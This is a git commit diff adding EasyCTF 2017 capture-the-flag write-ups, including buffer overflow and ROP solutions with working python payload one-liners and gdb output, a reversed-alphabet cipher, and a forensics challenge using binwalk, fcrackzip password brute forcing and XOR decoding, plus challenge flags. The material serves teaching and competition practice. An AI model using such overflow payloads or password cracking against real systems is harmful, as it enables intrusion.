Merge branch 'master' of https://github.com/EasyCTF/easyctf-2017-writeups

Author: ValarDragon

SUMMARY.md

@@ -2,8 +2,11 @@
 
 * [Introduction](README.md)
 * [Binary Exploitation](/binary-exploitation.md)
+  * [Doubly Dangerous \[110 points\]](/binary-exploitation/doubly-dangerous-110-points.md)
+  * [Simple ROP \[120 points\]](/binary-exploitation/simple-rop-120-points.md)
   * [Heaps of Knowledge \[420 points\]](/binary-exploitation/heaps-of-knowledge-420-points.md)
 * [Cryptography](cryptography.md)
+  * [Flip My Letters \[20 points\]](/cryptography/flip-my-letters-20-points.md)
   * [RSA 1 \[50 points\]](/cryptography/rsa-1-50-points.md)
   * [Hash on Hash \[100 points\]](/cryptography/hash-on-hash-100-points.md)
   * [Security Through Obscurity \[150 points\]](/cryptography/security-through-obscurity-150-points.md)
@@ -16,6 +19,7 @@
   * [Mane Event \[50 points\]](/forensics/mane-event-50-points.md)
   * [Petty Difference \[75 points\]](/forensics/petty-difference-75-points.md)
   * [Flag PEG \[150 points\]](/forensics/flag-peg-150-points.md)
+  * [Finn \[200 points\]](/forensics/finn-200-points.md)
   * [Serial \[300 points\]](/forensics/serial-300-points.md)
   * [Decomphose \[325 points\]](/forensics/decomphose-325-points.md)
   * [QR 2 \[330 points\]](/forensics/qr2-330-points.md)

binary-exploitation.md

@@ -3,8 +3,8 @@
 This category focuses on exploiting vulnerabilities in "binaries", or compiled programs, such as buffer overflow attacks, return-oriented programming, etc. The binary exploitation challenges this year include:
 
 * Risky Business \[100 points\]
-* Doubly Dangerous \[110 points\]
-* Simple ROP \[120 points\]
+* [Doubly Dangerous \[110 points\]](/binary-exploitation/doubly-dangerous-110-points.md)
+* [Simple ROP \[120 points\]](/binary-exploitation/simple-rop-120-points.md)
 * [Heaps of Knowledge \[420 points\]](/binary-exploitation/heaps-of-knowledge-420-points.md)
 
 

binary-exploitation/doubly-dangerous-110-points.md

@@ -0,0 +1,74 @@
+# Doubly Dangerous - 110 Points
+
+There seems to be an issue with [this](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/doubly-dangerous/doubly_dangerous?raw=true) binary. Can you exploit it?
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
+
+We were given a binary.
+
+We first run it to see what it does
+
+```
+Give me a string: 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+nope!
+Segmentation fault
+```
+
+Seems like a buffer overflow because there was a segmentation fault. This means gets() was probably used, and gets() does not care about the length of the string we input. Now let's take a look at the code in gdb with
+
+```
+gdb doubly_dangerous
+set disassembly-flavor intel
+disas main
+```
+
+Here is the interesting instruction:
+
+```
+0x0804863c <+53>:    fld    DWORD PTR [ebp-0xc]
+0x0804863f <+56>:    fld    DWORD PTR ds:0x804876c
+0x08048645 <+62>:    fucomip st,st(1)
+```
+
+We can see that fucomip is being used, which is floating point instructions. We surmise that we need to make this compare return true. We can see that the value at 0x804876c is being compared to the value at ebp-0xc. Because we saw a segmentation fault, we know this consists of an overflow. We experiment with the amount of bytes to type until the value at ebp-0xc is overflowed.
+
+```
+python -c "print 'A'*69" > temp
+
+(gdb) r < temp
+...
+Breakpoint 1, 0x08048686 in main ()
+(gdb) x/10wx $ebp-0xc
+0xffffd0dc:     0x41414141      0xf7fc0041      0xffffd100      0x00000000
+0xffffd0ec:     0xf7e31a83      0x08048690      0x00000000      0x00000000
+0xffffd0fc:     0xf7e31a83      0x00000001
+```
+
+Alright, we can see that 69 characters overflows the content at ebp-0xc and 1 extra character. This means we need 64 characters to get the ebp-0xc, and then with the next four characters, we can control what value to place in $ebp-0xc. Now, we need to check what value to replace it with.
+
+```
+(gdb) x/10wx 0x804876c
+0x804876c:      0x41348000      0x3b031b01      0x00000030      0x00000005
+0x804877c:      0xfffffc60      0x0000004c      0xfffffe0b      0x00000070
+0x804878c:      0xfffffe97      0x00000090
+```
+
+We can see the value we need is 0x41348000. Now we can construct our exploit.
+
+```
+python -c "print 'A'*64 + '\x00\x80\x34\x41'" | ./doubly_dangerous
+```
+
+```
+python -c "print 'A'*64 + '\x00\x80\x34\x41'" | ./doubly_dangerous
+Give me a string: 
+Success! Here is your flag:
+easyctf{bofs_and_floats_are_d0uble_tr0uble!}
+```
+
+## Flag
+
+>easyctf{bofs_and_floats_are_d0uble_tr0uble!}

binary-exploitation/heaps-of-knowledge-420-points.md

@@ -58,5 +58,6 @@ Oh look it worked! Running it against the EasyCTF server nets us the flag:
 
 * [https://github.com/VulnHub/ctf-writeups/blob/master/2017/easyctf/heaps-of-knowledge.md](https://github.com/VulnHub/ctf-writeups/blob/master/2017/easyctf/heaps-of-knowledge.md)
 
+* [https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Heaps-of-Knowledge](https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Heaps-of-Knowledge)
 
 

binary-exploitation/simple-rop-120-points.md

@@ -0,0 +1,61 @@
+# Simple ROP - 120 Points
+
+Read flag.txt
+
+[Source](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/simple-rop/simple-rop.c)
+
+[Binary](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/simple-rop/simple-rop?raw=true)
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
+
+We were given a binary and it's source code.
+
+```
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+
+void print_flag();
+void what_did_you_say();
+
+int main(int argc, char* argv[])
+{
+    gid_t gid = getegid();
+    setresgid(gid, gid, gid);
+    what_did_you_say();
+    return 0;
+}
+
+void print_flag()
+{
+    system("cat flag.txt");
+}
+
+void what_did_you_say()
+{
+    char buff[64];
+    gets(buff);
+    printf("You said: %s\n", buff);
+}
+```
+
+As the problem name suggests, this is a problem that uses ROP. We can see that we have to call the function print_flag() to get the flag, so we first get the address of this function with:
+
+>objdump -d simplerop | grep "print_flag"
+
+We find the address of print_flag to be: 0x804851a
+
+Then, we have to find out the number of characters until we gain control of eip through the return address. Afterwards we append the address of print_flag() in little endian order (reversed order in chunks of 2 bytes), then pipe the input through python (to print the non printable ascii characters).
+
+```
+python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop #NO SEG FAULT, NOT ENOUGH CHARACTERS
+
+python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop #GOT THE FLAG! 76 IS A PRETTY COMMON SIZE FOR AN ARRAY OF 64 CHARS
+```
+
+## Flag
+
+>easyctf{r0p_7o_v1ct0ry}

cryptography.md

@@ -3,7 +3,7 @@
 This category focuses on using advanced mathematical topics to encrypt data to prevent it from being intercepted/tampered with. Cryptography has many practical applications from HTTPS to cryptocurrency. The cryptography challenges in this contest include:
 
 * Clear and Concise Commentary on Caesar Cipher \[20 points\]
-* Flip My Letters \[20 points\]
+* [Flip My Letters \[20 points\]](/cryptography/flip-my-letters-20-points.md)
 * [RSA 1 \[50 points\]](/cryptography/rsa-1-50-points.md)
 * Let Me Be Frank \[75 points\]
 * RSA 2 \[80 points\]

cryptography/flip-my-letters-20-points.md

@@ -0,0 +1,24 @@
+# Flip My Letters - 20 points
+
+I dropped my alphabet on its head, can you help me reassemble it?
+```
+easyctf{r_wlmg_vevm_mvvw_zm_zhxrr_gzyov}
+```
+
+### Solution
+
+The hint suggests that it's a substitution cipher, where the key is the alphabet in reverse.
+It is easy to test the idea using the [tr](https://en.wikipedia.org/wiki/Tr_%28Unix%29) Unix command.
+Sure enough, it works.
+
+```
+$ echo "r_wlmg_vevm_mvvw_zm_zhxrr_gzyov" | tr abcdefghijklmnopqrstuvwxyz zyxwvutsrqponmlkjihgfedcba
+i_dont_even_need_an_ascii_table
+```
+
+Flag:
+```
+easyctf{i_dont_even_need_an_ascii_table}
+```
+
+### External Writeups

forensics.md

@@ -14,7 +14,7 @@ This category refers to the recovery of information from evidence, like extracti
 * My USB [\[150 points\]](/forensics/my-usb-150-points.md)
 * [Flag PEG \[150 points\]](/forensics/flag-peg-150-points.md)
 * ZIP Tunnel \[160 points\]
-* Finn \[200 points\]
+* [Finn \[200 points\]](/forensics/finn-200-points.md)
 * Kittycat \[290 points\]
 * [Serial \[300 points\]](/forensics/serial-300-points.md)
 * [Decomphose \[325 points\]](/forensics/decomphose-325-points.md)

forensics/bizarro-400-points.md

@@ -1,6 +1,10 @@
 # Bizarro - 400 Points
 
-#### phsst - VoidMercy's writeup
+Something seems very strange about [this](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/bizarro/crpt.png) strange looking image. Check it out?
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
 
 We were given an image.
 

forensics/finn-200-points.md

@@ -0,0 +1,60 @@
+# Finn - 200 points
+
+The Resistance intercepted this suspicious [picture](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/finn/finn.jpg?raw=true) of Finn's old stormtrooper helmet, sent by General Hux to Kylo Ren. Hux isn't exactly Finn's biggest fan. What could he be hiding? Good luck!
+
+If you get stuck, We also have [this](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/finn/help.txt?raw=true) blob of sarcasm, which may or may not be useful in your quest. Worth a shot right?.
+
+### Solution
+##### Writeup by Alaska47 from phsst
+
+We are given a jpg. Looking at the first part of the hint, we know that we have to `binwalk` the file. Running `binwalk -e finn.jpg` gives us what we need.
+
+After we binwalk it, we see that there is a zip file protected by a password. Although the hint says that the password refers to the problem statement, I just used brute force using the `fcrackzip` tool. Running `fcrackzip -v -m zip2 -l 1-8 -u AD3E.zip` gives us the password to the zip file: `2187`.
+
+After extracting the zip file, we see two "identical" images. The hint says we should find the difference in the images. Imagemagick's `compare` tool should do the trick. Running `compare kylo1.png kylo2.png diff.png` gives us a new file which contains a QR code. 
+
+![](https://github.com/VoidMercy/EasyCTF-Writeups-2017/blob/master/forensics/Finn/small_diff.png?raw=true)
+
+Scanning the QR code using any online scanner gives us some text:
+
+`\x63\x68\x66\x63\x7e\x71\x73\x34\x76\x57\x72\x3c\x74\x73\x5c\x31\x75\x5d\x6b\x32\x34\x77\x59\x38\x4c\x7f`
+
+The next part of the hint tells us to look more closely at the difference in the two images. After manually comparing the differences in the pixels, it looks like some of the pixels diffeerentiate by more than 1. Starting at (144, 533) in the image, we find a string of pixels which have differences ranging from 5-8 for about ~30 pixels in the x-direction. 
+
+![](https://github.com/VoidMercy/EasyCTF-Writeups-2017/blob/master/forensics/Finn/subs.png?raw=true)
+
+After seeing the hex bytes extracted from the QR code, I started to think that the encryption refered to by the hint was XOR encryption. This meant that the message and the key needed to have the same size. Starting at (144, 533), I extracted the differences in the next 26 pixels.
+
+```python
+from PIL import Image
+
+f = Image.open("kylo1.png").convert("RGB")
+g = Image.open("kylo2.png").convert("RGB")
+
+diffs = []
+
+for x in range(f.size[0]):
+    for y in range(f.size[1]):
+        pix1 = f.getpixel((x,y))
+        pix2 = g.getpixel((x,y))
+        sub = (abs(pix2[0]-pix1[0]),abs(pix2[1]-pix1[1]),abs(pix2[2]-pix1[2]))
+        if(sub != (0,0,0) and sub != (1,1,1)):
+            print((x,y))
+            diffs.append(sub[0])
+print(diffs)
+
+gu = []
+for x in range(144, 144+26):
+    pix1 = f.getpixel((x,533))
+    pix2 = g.getpixel((x,533))
+    gg = abs(pix2[0]-pix1[0])
+    gu.append(str(gg))
+print("".join(gu))
+```
+
+This script outputs `54745270485860306291136282`.
+
+Armed with a message and the key, I simply used an online XOR tool to XOR `636866637e7173347657723c74735c31755d6b32347759384c7f` and `0504070405020700040805080600030006020901010306020802`. Doing so gives us another hex string, `666c61677b737434725f773472735f31735f623335745f3a447d`, which can be converted to text to reveal the flag.
+
+## Flag
+>easyctf{st4r_w4rs_1s_b35t_:D}

forensics/flag-peg-150-points.md

@@ -1,6 +1,10 @@
 # Flag PEG - 150 Points
 
-#### phsst - VoidMercy's writeup
+We found a flag but it didn't do anything. Maybe you can find a better [flag](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/flag-peg/heresaflag.jpg)?
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
 
 We were given a .jpg file.
 

forensics/qr2-330-points.md

@@ -1,8 +1,10 @@
-#QR2 - 330 points
+# QR2 - 330 points
 
-#### phsst - VoidMercy's writeup
+When I am not practicing my [Oboe](https://en.wikipedia.org/wiki/Oboe) for band, I have been working on a QR code generator. For some reason, some of the images are not scannable. [Here](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/qr-2/qr2.bmp) is one, can you tell me what it says?
 
-We were given a broken QR code.
+### Solution
+
+###### Writeup by VoidMercy from phsst
 
 The problem mentioned that this problem is related to "OBOE" somehow. We search this up and find that OBOE can also stand for off by one error. We surmised that the off by one refers to the mask of the QR code, so we manually changed the mask of the QR code to see if it would decode. Sadly, none of the masks work. (See wikipedia for more information on masks).